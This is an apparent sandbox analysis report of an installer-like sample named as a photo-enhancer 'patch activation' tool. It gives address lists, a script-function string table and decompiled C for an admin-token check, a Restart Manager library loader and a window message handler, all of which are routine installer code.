0x00491c7e
0x00491c83
0x00491c85
0x00491cfd
0x00491c87
0x00491c91
0x00491ca0
0x00491ca8
0x00491cb1
0x00491cc8
0x00491ccd
0x00491ccf
0x00491cde
0x00491ce4
0x00491cd1
0x00491cd7
0x00491cd7
0x00491ced
0x00491ced
0x00491c85
0x00491b66
0x00491b76
0x00491b85
0x00491baa
0x00491baf
0x00491bb1
0x00491c1d
0x00491bb3
0x00491bbd
0x00491bce
0x00491be8
0x00491bed
0x00491bef
0x00491bfe
0x00491c04
0x00491bf1
0x00491bf7
0x00491bf7
0x00491c0d
0x00491c0d
0x00491bb1
0x00491a5c
0x00491a6c
0x00491a7b
0x00491aa0
0x00491aa5
0x00491aa7
0x00491b49
0x00491aad
0x00491ab7
0x00491ac6
0x00491acb
0x00491acf
0x00491ad4
0x00491ad9
0x00491adc
0x00491ae1
0x00491aeb
0x00491aeb
0x00491ae1
0x00491af3
0x00491afd
0x00491b14
0x00491b19
0x00491b1b
0x00491b2a
0x00491b30
0x00491b1d
0x00491b23
0x00491b23
0x00491b39
0x00491b39
0x00491aa7
0x0049197b
0x0049198b
0x0049199a
0x004919bf
0x004919c4
0x004919c6
0x00491a3f
0x004919c8
0x004919d2
0x004919e1
0x004919e9
0x004919f3
0x00491a0a
0x00491a0f
0x00491a11
0x00491a20
0x00491a26
0x00491a13
0x00491a19
0x00491a19
0x00491a2f
0x00491a2f
0x004919c6
0x00000000
0x00491975
0x00491874
0x00491883
0x004918a8
0x004918ad
0x004918af
0x0049195e
0x00000000
0x0049195e
0x004918bf
0x004918ce
0x004918e5
0x004918ec
0x004918f1
0x004918f3
0x00491904
0x00491904
0x0049190b
0x0049190e
0x00491929
0x0049192e
0x00491930
0x0049193f
0x00491945
0x00491932
0x00491938
0x00491938
0x0049194e
0x00000000
0x0049194e
0x004918f5
0x004918f9
0x00000000
0x00000000
0x004918fb
0x00000000
0x004918fb
0x00491767
0x00491776
0x00491793
0x00491798
0x0049179a
0x00491847
0x004917a0
0x004917aa
0x004917c3
0x004917ca
0x004917cf
0x004917d1
0x00491828
0x0049182e
0x004917d3
0x004917d9
0x004917f6
0x004917fb
0x004917fd
0x00491821
0x004917ff
0x00491809
0x00491814
0x00491814
0x004917fd
0x00491837
0x00491837
0x00000000
0x0049179a
0x0049168a
0x00491699
0x004916b6
0x004916bb
0x004916bd
0x0049173a
0x00000000
0x0049173a
0x004916c9
0x004916ce
0x004916f0
0x004916f5
0x004916f7
0x0049171b
0x0049171b
0x00491721
0x00491726
0x0049172a
0x00000000
0x0049172a
0x004916f9
0x004916fd
0x00000000
0x00000000
0x00491709
0x00491714
0x00000000
0x00491714
0x004915c8
0x004915d7
0x004915f4
0x004915f9
0x004915fb
0x0049165d
0x004915fd
0x00491607
0x00491618
0x00491620
0x00491638
0x00491644
0x0049164d
0x0049164d
0x00000000
0x004915fb
0x00491506
0x00491515
0x00491532
0x00491537
0x00491539
0x0049159b
0x0049153b
0x00491545
0x00491556
0x0049155e
0x00491576
0x00491582
0x0049158b
0x0049158b
0x00000000
0x00491539
0x00491495
0x004914ab
0x004914c0
0x004914d9
0x00000000
0x004914d9
0x00491428
0x0049143e
0x00491453
0x0049146c
0x00000000
0x0049146c
0x00491387
0x00491396
0x004913b3
0x004913b8
0x004913ba
0x004913ff
0x004913bc
0x004913c6
0x004913dd
0x004913e6
0x004913ef
0x004913ef
0x00000000
0x004913ba
0x00491328
0x00491337
0x0049135a
0x00000000
0x0049135a
0x004912cd
0x004912dc
0x004912f6
0x004912ff
0x00000000
0x004912ff
0x0049122f
0x0049123e
0x0049125b
0x00491260
0x00491262
0x004912a4
0x00491264
0x0049126e
0x0049128b
0x00491294
0x00491294
0x00000000
0x00491262
0x004911ae
0x004911bd
0x004911da
0x004911df
0x004911e1
0x00491202
0x004911e3
0x004911e9
0x004911f2
0x004911f2
0x00000000
0x004911e1
0x00491165
0x00491178
0x00491185
0x00000000
0x00491185
0x004910e2
0x004910e7
0x004910f0
0x004910f5
0x004910f7
0x00491144
0x004910f9
0x00491100
0x00491113
0x0049111e
0x00491123
0x0049112c
0x00491134
0x00491134
0x00000000
0x004910f7
0x004910c1
0x00000000
0x004910c1
0x0049104a
0x0049105b
0x00491066
0x0049106e
0x00491079
0x00491084
0x00491090
0x0049109d
0x00000000
0x0049109d
0x00490fe3
0x00490ff2
0x00490ffa
0x00491005
0x0049101c
0x00491029
0x00000000
0x00491029
0x00490fb6
0x00490fc2
0x00000000
0x00490fc2
0x00490f89
0x00490f8e
0x00490f9a
0x00000000
0x00490f9a
0x00490f61
0x00490f6d
0x00490f36
0x00490f39
0x00490f45
0x00490f45
0x00490f0e
0x00490f11
0x00490f1d
0x00490f1d
0x00490ed1
0x00490ed9
0x00490ee4
0x00490ee9
0x00490ef5
0x00490ef5
0x00490e99
0x00490ea1
0x00490eac
0x00490eb8
0x00490eb8
0x00490e61
0x00490e69
0x00490e74
0x00490e80
0x00490e80
0x00490e29
0x00490e31
0x00490e3c
0x00490e48
0x00490e48
0x00490df1
0x00490df9
0x00490e04
0x00490e10
0x00490e10
0x00490db9
0x00490dc1
0x00490dcc
0x00490dd8
0x00490dd8
0x00490d87
0x00490d94
0x00490da0
0x00490da0
0x00490d63
0x00490d6e
0x00490d6e
0x00490d3b
0x00490d3e
0x00490d4a
0x00490d4a
0x00490d03
0x00490d0b
0x00490d16
0x00490d22
0x00490d22
0x00490cc9
0x00490cd1
0x00490cd9
0x00490ce1
0x00490ce9
0x00490cea
0x00490cea
0x00490c7b
0x00490c85
0x00490c8d
0x00490c96
0x00490c9e
0x00490ca6
0x00490cae
0x00490caf
0x00490cb0
0x00490cb0
0x00490c10
0x00490c1a
0x00490c22
0x00490c2d
0x00490c35
0x00490c3e
0x00490c62
0x00490c62
0x00490ba5
0x00490baf
0x00490bb7
0x00490bc2
0x00490bca
0x00490bd3
0x00490bdb
0x00490be3
0x00490bea
0x00490beb
0x00490bf7
0x00490bf7
0x00490b36
0x00490b40
0x00490b48
0x00490b53
0x00490b5b
0x00490b66
0x00490b6e
0x00490b77
0x00490b7f
0x00490b8c
0x00490b8c
0x00490aee
0x00490af8
0x00490b00
0x00490b09
0x00490b11
0x00490b1d
0x00490b1d
0x00490a92
0x00490a9c
0x00490aa4
0x00490aaf
0x00490ab7
0x00490ac0
0x00490ac8
0x00490ac9
0x00490ad5
0x00490ad5
0x00490a27
0x00490a31
0x00490a39
0x00490a44
0x00490a4c
0x00490a55
0x00490a5d
0x00490a65
0x00490a6c
0x00490a6d
0x00490a79
0x00490a79
0x004909a2
0x004909ae
0x004909bb
0x004909c6
0x004909ce
0x004909d9
0x004909e1
0x004909ea
0x004909f2
0x004909fa
0x00490a01
0x00490a02
0x00490a0e
0x00490a0e
0x0049092e
0x00490938
0x00490940
0x00490944
0x0049094f
0x00490957
0x00490962
0x0049096a
0x00490973
0x0049097b
0x0049097c
0x0049097d
0x00490989
0x00490989
0x004908f5
0x004908fd
0x00490905
0x00490915
0x00490915
0x004908bc
0x004908c4
0x004908cc
0x004908dc
0x004908dc
0x00000000
0x00490883
0x0049088b
0x00490893
0x00490898
0x004908a3
0x00491ef1
0x00491ef3
0x00491ef6
0x00491ef9
0x00491f06
0x00491f13
0x00491f20
0x00491f20

Strings

DELETEINISECTION, xrefs: 00490CBD
REMOVEBACKSLASHUNLESSROOT, xrefs: 00490E1D
REGWRITEBINARYVALUE, xrefs: 00491C2A
GETCMDTAIL, xrefs: 00490D2F
FILEEXISTS, xrefs: 00490877
REGWRITEDWORDVALUE, xrefs: 00491B56
ADDPERIOD, xrefs: 00491DAB
ISINISECTIONEMPTY, xrefs: 00490AE2
STRINGCHANGEEX, xrefs: 00491036
REGGETVALUENAMES, xrefs: 00491479
FONTEXISTS, xrefs: 00491D52
WILDCARDMATCH, xrefs: 00491EA1
GETSYSTEMDIR, xrefs: 00490F2A
ISPOWERUSERLOGGEDON, xrefs: 00491D2E
INIKEYEXISTS, xrefs: 00490A86
GETSYSNATIVEDIR, xrefs: 00490F7A
REGQUERYMULTISTRINGVALUE, xrefs: 004915A8
CONVERTPERCENTSTR, xrefs: 00491151
ADDBACKSLASH, xrefs: 00490DAD
GETINIINT, xrefs: 00490996
DIREXISTS, xrefs: 004908B0
USINGWINNT, xrefs: 004910AA
GETTEMPDIR, xrefs: 00490FA7
REGDELETEKEYIFEMPTY, xrefs: 0049130C
GETSYSWOW64DIR, xrefs: 00490F52
REGDELETEKEYINCLUDINGSUBKEYS, xrefs: 004912B1
REGQUERYSTRINGVALUE, xrefs: 004914E6
FILECOPY, xrefs: 004910CE
ISADMINLOGGEDON, xrefs: 00491D0A
DELETEINIENTRY, xrefs: 00490C6F
REGWRITEEXPANDSTRINGVALUE, xrefs: 0049196B
GETWINDIR, xrefs: 00490F02
REGGETSUBKEYNAMES, xrefs: 0049140C
GETINISTRING, xrefs: 00490922
SETINISTRING, xrefs: 00490B2A
GETSHORTNAME, xrefs: 00490EC5
FILEORDIREXISTS, xrefs: 004908E9
SETNTFSCOMPRESSION, xrefs: 00491E27
GETINIBOOL, xrefs: 00490A1B
REGKEYEXISTS, xrefs: 00491192
REGQUERYDWORDVALUE, xrefs: 0049166A
REMOVEQUOTES, xrefs: 00490E8D
ISWILDCARD, xrefs: 00491E70
GETENV, xrefs: 00490CF7
STRINGCHANGE, xrefs: 00490FCF
GETUILANGUAGE, xrefs: 00491D86
SETINIINT, xrefs: 00490B99
CHARLENGTH, xrefs: 00491DE3
PARAMCOUNT, xrefs: 00490D57
SETINIBOOL, xrefs: 00490C04
REGVALUEEXISTS, xrefs: 0049120F
REGWRITESTRINGVALUE, xrefs: 00491854
ADDQUOTES, xrefs: 00490E55
REMOVEBACKSLASH, xrefs: 00490DE5
REGWRITEMULTISTRINGVALUE, xrefs: 00491A4C
PARAMSTR, xrefs: 00490D7B
REGDELETEVALUE, xrefs: 00491367
REGQUERYBINARYVALUE, xrefs: 00491747

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID:
String ID: ADDBACKSLASH$ADDPERIOD$ADDQUOTES$CHARLENGTH$CONVERTPERCENTSTR$DELETEINIENTRY$DELETEINISECTION$DIREXISTS$FILECOPY$FILEEXISTS$FILEORDIREXISTS$FONTEXISTS$GETCMDTAIL$GETENV$GETINIBOOL$GETINIINT$GETINISTRING$GETSHORTNAME$GETSYSNATIVEDIR$GETSYSTEMDIR$GETSYSWOW64DIR$GETTEMPDIR$GETUILANGUAGE$GETWINDIR$INIKEYEXISTS$ISADMINLOGGEDON$ISINISECTIONEMPTY$ISPOWERUSERLOGGEDON$ISWILDCARD$PARAMCOUNT$PARAMSTR$REGDELETEKEYIFEMPTY$REGDELETEKEYINCLUDINGSUBKEYS$REGDELETEVALUE$REGGETSUBKEYNAMES$REGGETVALUENAMES$REGKEYEXISTS$REGQUERYBINARYVALUE$REGQUERYDWORDVALUE$REGQUERYMULTISTRINGVALUE$REGQUERYSTRINGVALUE$REGVALUEEXISTS$REGWRITEBINARYVALUE$REGWRITEDWORDVALUE$REGWRITEEXPANDSTRINGVALUE$REGWRITEMULTISTRINGVALUE$REGWRITESTRINGVALUE$REMOVEBACKSLASH$REMOVEBACKSLASHUNLESSROOT$REMOVEQUOTES$SETINIBOOL$SETINIINT$SETINISTRING$SETNTFSCOMPRESSION$STRINGCHANGE$STRINGCHANGEEX$USINGWINNT$WILDCARDMATCH
API String ID: 0-2995905506
Opcode ID: a643e45d5f84dc3785101f36d346dacbc44adc2aceff17f71dcaf1c5dd48987e
Instruction ID: 531e8d64222ffae2c249fa443d2387929f23501f78df198fe4c1f2eaeed2c77d
Opcode Fuzzy Hash: a643e45d5f84dc3785101f36d346dacbc44adc2aceff17f71dcaf1c5dd48987e
Instruction Fuzzy Hash: 8FD25270B041055BDF10EB79CD829AEBAA5AF48314F50943FB802AB796DF3CDD068799

Uniqueness

Uniqueness Score: -1.00%

Function 0042E52C Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 178
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 43%

			E0042E52C(long __eax, void* __edi) {
				char _v5;
				void* _v12;
				signed int _v16;
				void* _v20;
				long _v24;
				void* _v28;
				void* _t84;
				intOrPtr* _t96;
				signed int _t97;
				intOrPtr _t102;
				intOrPtr _t103;
				void* _t108;
				void* _t109;
				void* _t111;
				void* _t113;
				intOrPtr _t114;

				_t111 = _t113;
				_t114 = _t113 + 0xffffffe8;
				if( *0x49c0dc == 2) {
					_v5 = 0;
					if(AllocateAndInitializeSid(0x49c788, 2, 0x20, __eax, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
						goto L26;
					} else {
						_push(_t111);
						_push(0x42e710);
						_push( *[fs:eax]);
						 *[fs:eax] = _t114;
						_t96 = 0;
						if((GetVersion() & 0x000000ff) >= 5) {
							_t96 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
						}
						if(_t96 == 0) {
							_v28 = 0;
							if(OpenThreadToken(GetCurrentThread(), 8, 1,  &_v20) != 0) {
								L13:
								_push(_t111);
								_push(0x42e6f2);
								_push( *[fs:eax]);
								 *[fs:eax] = _t114;
								_v24 = 0;
								if(GetTokenInformation(_v20, 2, 0, 0,  &_v24) != 0 || GetLastError() == 0x7a) {
									_v28 = E00402648(_v24);
									if(GetTokenInformation(_v20, 2, _v28, _v24,  &_v24) != 0) {
										_t108 =  *_v28 - 1;
										if(_t108 >= 0) {
											_t109 = _t108 + 1;
											_t97 = 0;
											while(EqualSid(_v12,  *(_v28 + 4 + _t97 * 8)) == 0 || ( *(_v28 + 8 + _t97 * 8) & 0x00000014) != 4) {
												_t97 = _t97 + 1;
												_t109 = _t109 - 1;
												if(_t109 != 0) {
													continue;
												}
												goto L24;
											}
											_v5 = 1;
										}
										L24:
										_pop(_t102);
										 *[fs:eax] = _t102;
										_push(E0042E6F9);
										E00402660(_v28);
										return CloseHandle(_v20);
									} else {
										E004031BC();
										E004031BC();
										goto L26;
									}
								} else {
									E004031BC();
									E004031BC();
									goto L26;
								}
							} else {
								if(GetLastError() == 0x3f0) {
									if(OpenProcessToken(GetCurrentProcess(), 8,  &_v20) != 0) {
										goto L13;
									} else {
										E004031BC();
										goto L26;
									}
								} else {
									E004031BC();
									goto L26;
								}
							}
						} else {
							_t84 =  *_t96(0, _v12,  &_v16); // executed
							if(_t84 != 0) {
								asm("sbb eax, eax");
								_v5 =  ~( ~_v16);
							}
							_pop(_t103);
							 *[fs:eax] = _t103;
							_push(E0042E717);
							return FreeSid(_v12);
						}
					}
				} else {
					_v5 = 1;
					L26:
					return _v5;
				}
			}

0x0042e52d
0x0042e52f
0x0042e53d
0x0042e548
0x0042e56d
0x00000000
0x0042e573
0x0042e575
0x0042e576
0x0042e57b
0x0042e57e
0x0042e581
0x0042e590
0x0042e5a7
0x0042e5a7
0x0042e5ab
0x0042e5d4
0x0042e5ec
0x0042e623
0x0042e625
0x0042e626
0x0042e62b
0x0042e62e
0x0042e633
0x0042e64b
0x0042e66e
0x0042e68a
0x0042e69d
0x0042e6a0
0x0042e6a2
0x0042e6a3
0x0042e6a5
0x0042e6cf
0x0042e6d0
0x0042e6d1
0x00000000
0x00000000
0x00000000
0x0042e6d1
0x0042e6c9
0x0042e6c9
0x0042e6d3
0x0042e6d5
0x0042e6d8
0x0042e6db
0x0042e6e3
0x0042e6f1
0x0042e68c
0x0042e68c
0x0042e691
0x00000000
0x0042e691
0x0042e657
0x0042e657
0x0042e65c
0x00000000
0x0042e65c
0x0042e5ee
0x0042e5f8
0x0042e617
0x00000000
0x0042e619
0x0042e619
0x00000000
0x0042e619
0x0042e5fa
0x0042e5fa
0x00000000
0x0042e5fa
0x0042e5f8
0x0042e5ad
0x0042e5b7
0x0042e5bb
0x0042e5c6
0x0042e5ca
0x0042e5ca
0x0042e6fb
0x0042e6fe
0x0042e701
0x0042e70f
0x0042e70f
0x0042e5ab
0x0042e53f
0x0042e53f
0x0042e717
0x0042e71f
0x0042e71f

APIs

AllocateAndInitializeSid.ADVAPI32(0049C788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E566
GetVersion.KERNEL32(00000000,0042E710,?,0049C788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E583
GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E710,?,0049C788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E59C
GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E5A2
CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E710,?,0049C788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E5B7
FreeSid.ADVAPI32(00000000,0042E717,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E70A

Strings

advapi32.dll, xrefs: 0042E597
CheckTokenMembership, xrefs: 0042E592

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
String ID: CheckTokenMembership$advapi32.dll
API String ID: 2252812187-1888249752
Opcode ID: f4960b7a49011525d960532232f681973928629b6f01e22650505b23fa7ca7d4
Instruction ID: bd7b6b299922f244852f5898a9d4d4a5ef1c154b8f3e5ea1adaf5ad24a825e41
Opcode Fuzzy Hash: f4960b7a49011525d960532232f681973928629b6f01e22650505b23fa7ca7d4
Instruction Fuzzy Hash: 36519471B44315AEEB11EAE69C42B7F77ACDB19304F94047BB500EB282D57CDD048B69

Uniqueness

Uniqueness Score: -1.00%

Function 00450A28 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 76
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E00450A28(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t24;
				struct HINSTANCE__* _t26;
				struct HINSTANCE__* _t28;
				struct HINSTANCE__* _t30;
				struct HINSTANCE__* _t32;
				struct HINSTANCE__* _t34;
				intOrPtr _t42;
				intOrPtr _t50;

				_push(0);
				_push(0);
				_push(_t50);
				_push(0x450b45);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50;
				 *0x49e84c =  *0x49e84c + 1;
				if( *0x49e848 == 0 && (GetVersion() & 0x000000ff) >= 6) {
					E004509F8( &_v12);
					E0042C88C(_v12,  &_v8);
					E0040357C( &_v8, "Rstrtmgr.dll");
					_t23 = LoadLibraryA(E00403738(_v8)); // executed
					 *0x49e848 = _t23;
					if( *0x49e848 != 0) {
						_t24 =  *0x49e848; // 0x6f610000
						 *0x49e830 = GetProcAddress(_t24, "RmStartSession");
						_t26 =  *0x49e848; // 0x6f610000
						 *0x49e834 = GetProcAddress(_t26, "RmRegisterResources");
						_t28 =  *0x49e848; // 0x6f610000
						 *0x49e838 = GetProcAddress(_t28, "RmGetList");
						_t30 =  *0x49e848; // 0x6f610000
						 *0x49e83c = GetProcAddress(_t30, "RmShutdown");
						_t32 =  *0x49e848; // 0x6f610000
						 *0x49e840 = GetProcAddress(_t32, "RmRestart");
						_t34 =  *0x49e848; // 0x6f610000
						 *0x49e844 = GetProcAddress(_t34, "RmEndSession");
					}
				}
				_pop(_t42);
				 *[fs:eax] = _t42;
				_push(E00450B4C);
				return E00403420( &_v12, 2);
			}

0x00450a2b
0x00450a2d
0x00450a34
0x00450a35
0x00450a3a
0x00450a3d
0x00450a40
0x00450a4d
0x00450a69
0x00450a74
0x00450a81
0x00450a8f
0x00450a94
0x00450aa0
0x00450aa7
0x00450ab2
0x00450abc
0x00450ac7
0x00450ad1
0x00450adc
0x00450ae6
0x00450af1
0x00450afb
0x00450b06
0x00450b10
0x00450b1b
0x00450b1b
0x00450aa0
0x00450b2c
0x00450b2f
0x00450b32
0x00450b44

APIs

GetVersion.KERNEL32(00000000,00450B45,?,?,?,?,00000000,00000000,?,00482E33), ref: 00450A53

Part of subcall function 004509F8: GetSystemDirectoryA.KERNEL32 ref: 00450A10

LoadLibraryA.KERNEL32(00000000,00000000,00450B45,?,?,?,?,00000000,00000000,?,00482E33), ref: 00450A8F
GetProcAddress.KERNEL32(6F610000,RmStartSession), ref: 00450AAD
GetProcAddress.KERNEL32(6F610000,RmRegisterResources), ref: 00450AC2
GetProcAddress.KERNEL32(6F610000,RmGetList), ref: 00450AD7
GetProcAddress.KERNEL32(6F610000,RmShutdown), ref: 00450AEC
GetProcAddress.KERNEL32(6F610000,RmRestart), ref: 00450B01
GetProcAddress.KERNEL32(6F610000,RmEndSession), ref: 00450B16

Strings

RmGetList, xrefs: 00450ACC
RmEndSession, xrefs: 00450B0B
Rstrtmgr.dll, xrefs: 00450A7C
RmStartSession, xrefs: 00450AA2
RmRestart, xrefs: 00450AF6
RmShutdown, xrefs: 00450AE1
RmRegisterResources, xrefs: 00450AB7

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystemVersion
String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
API String ID: 2754715182-3419246398
Opcode ID: 9a43f9b1373e2638bd1f1905fb6064a6ec5500b1ac15f76ec76f6d57a187e068
Instruction ID: 2841e6775defb51719e30d1654eee8915289afef741f041a49b247766738df14
Opcode Fuzzy Hash: 9a43f9b1373e2638bd1f1905fb6064a6ec5500b1ac15f76ec76f6d57a187e068
Instruction Fuzzy Hash: 8F212EB4510204BFE710FBE2DC86B6E77E8E714759F540537B840A71A2E678A949CB1C

Uniqueness

Uniqueness Score: -1.00%

Function 0042409C Relevance: 21.4, APIs: 14, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E0042409C(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t129;
				struct HWND__* _t130;
				struct HWND__* _t133;
				void* _t134;
				struct HWND__* _t135;
				struct HWND__* _t137;
				struct HWND__* _t139;
				struct HWND__* _t142;
				intOrPtr _t143;
				intOrPtr _t153;
				struct HWND__* _t160;
				struct HWND__* _t162;
				int _t165;
				int _t168;
				struct HWND__* _t169;
				struct HWND__* _t180;
				struct HWND__* _t186;
				intOrPtr _t187;
				struct HWND__* _t190;
				intOrPtr _t191;
				int _t198;
				struct HWND__* _t202;
				struct HWND__* _t207;
				struct HWND__* _t214;
				struct HWND__* _t216;
				intOrPtr _t217;
				struct HWND__* _t219;
				intOrPtr _t225;
				struct HWND__* _t241;
				struct HWND__* _t246;
				intOrPtr _t247;
				intOrPtr _t249;
				intOrPtr _t254;
				intOrPtr _t257;
				struct HWND__* _t262;
				int _t265;
				intOrPtr _t269;
				intOrPtr* _t274;
				void* _t279;
				intOrPtr _t281;
				struct HWND__* _t285;
				struct HWND__* _t286;
				void* _t300;
				void* _t303;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr _t330;
				void* _t331;
				void* _t333;
				void* _t338;
				void* _t339;
				intOrPtr _t340;

				_push(_t333);
				_push(_t331);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t339);
				_push(0x4245ec);
				_push( *[fs:edx]);
				 *[fs:edx] = _t340;
				 *(_v12 + 0xc) = 0;
				_t279 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x80)) + 8)) - 1;
				if(_t279 < 0) {
					L5:
					E00423FF8(_v8, _v12);
					_t281 =  *_v12;
					_t129 = _t281;
					__eflags = _t129 - 0x112;
					if(__eflags > 0) {
						__eflags = _t129 - 0xb017;
						if(__eflags > 0) {
							_t130 = _t129 - 0xb01a;
							__eflags = _t130;
							if(_t130 == 0) {
								_t133 = IsIconic( *(_v8 + 0x20));
								__eflags = _t133;
								if(_t133 == 0) {
									_t135 = GetFocus();
									_t314 = _v8;
									__eflags = _t135 -  *((intOrPtr*)(_t314 + 0x20));
									if(_t135 ==  *((intOrPtr*)(_t314 + 0x20))) {
										_t137 = E0041F484(0);
										__eflags = _t137;
										if(_t137 != 0) {
											SetFocus(_t137);
										}
									}
								}
								L87:
								_t134 = 0;
								_pop(_t313);
								 *[fs:eax] = _t313;
								goto L88;
							}
							_t139 = _t130 - 5;
							__eflags = _t139;
							if(_t139 == 0) {
								E00424CE0(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L87;
							}
							_t142 = _t139 - 1;
							__eflags = _t142;
							if(_t142 == 0) {
								_t143 = _v12;
								__eflags =  *(_t143 + 4);
								if( *(_t143 + 4) != 0) {
									E004249BC(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E00424964(_v8, _t331, _t333,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L87;
							}
							__eflags = _t142 == 0x11;
							if(_t142 == 0x11) {
								_t153 = _v12;
								__eflags =  *((intOrPtr*)(_t153 + 4)) - 1;
								if( *((intOrPtr*)(_t153 + 4)) != 1) {
									 *(_v8 + 0x88) =  *(_v12 + 8);
								} else {
									 *(_v12 + 0xc) =  *(_v8 + 0x88);
								}
							} else {
								L86:
								E00424014(_t339); // executed
							}
							goto L87;
						}
						if(__eflags == 0) {
							_t160 =  *(_v8 + 0x28);
							__eflags = _t160;
							if(_t160 != 0) {
								_t335 = _t160;
								_t162 = E00418670(_t160);
								__eflags = _t162;
								if(_t162 != 0) {
									_t165 = IsWindowEnabled(E00418670(_t335));
									__eflags = _t165;
									if(_t165 != 0) {
										_t168 = IsWindowVisible(E00418670(_t335));
										__eflags = _t168;
										if(_t168 != 0) {
											 *0x49c578 = 0;
											_t169 = GetFocus();
											SetFocus(E00418670(_t335));
											E004156D0(_t335,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t169);
											 *0x49c578 = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L87;
						}
						_t180 = _t129 + 0xfffffece - 7;
						__eflags = _t180;
						if(_t180 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t281 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L87;
						}
						_t186 = _t180 - 0xaec7;
						__eflags = _t186;
						if(_t186 == 0) {
							_t187 = _v8;
							__eflags =  *((short*)(_t187 + 0xbe));
							if( *((short*)(_t187 + 0xbe)) != 0) {
								 *((intOrPtr*)(_v8 + 0xbc))();
							}
							goto L87;
						}
						_t190 = _t186 - 1;
						__eflags = _t190;
						if(_t190 == 0) {
							_t191 = _v8;
							__eflags =  *((short*)(_t191 + 0xb6));
							if( *((short*)(_t191 + 0xb6)) != 0) {
								 *((intOrPtr*)(_v8 + 0xb4))();
							}
							goto L87;
						}
						__eflags = _t190 == 0x15;
						if(_t190 == 0x15) {
							_t285 =  *(_v8 + 0x28);
							__eflags = _t285;
							if(_t285 != 0) {
								__eflags =  *(_t285 + 0x124);
								if( *(_t285 + 0x124) != 0) {
									_t198 = IsWindowEnabled(E00418670(_t285));
									__eflags = _t198;
									if(_t198 != 0) {
										_t202 = E004127A0( *((intOrPtr*)( *(_v8 + 0x28) + 0x124)), _v12);
										__eflags = _t202;
										if(_t202 != 0) {
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L87;
						} else {
							goto L86;
						}
					}
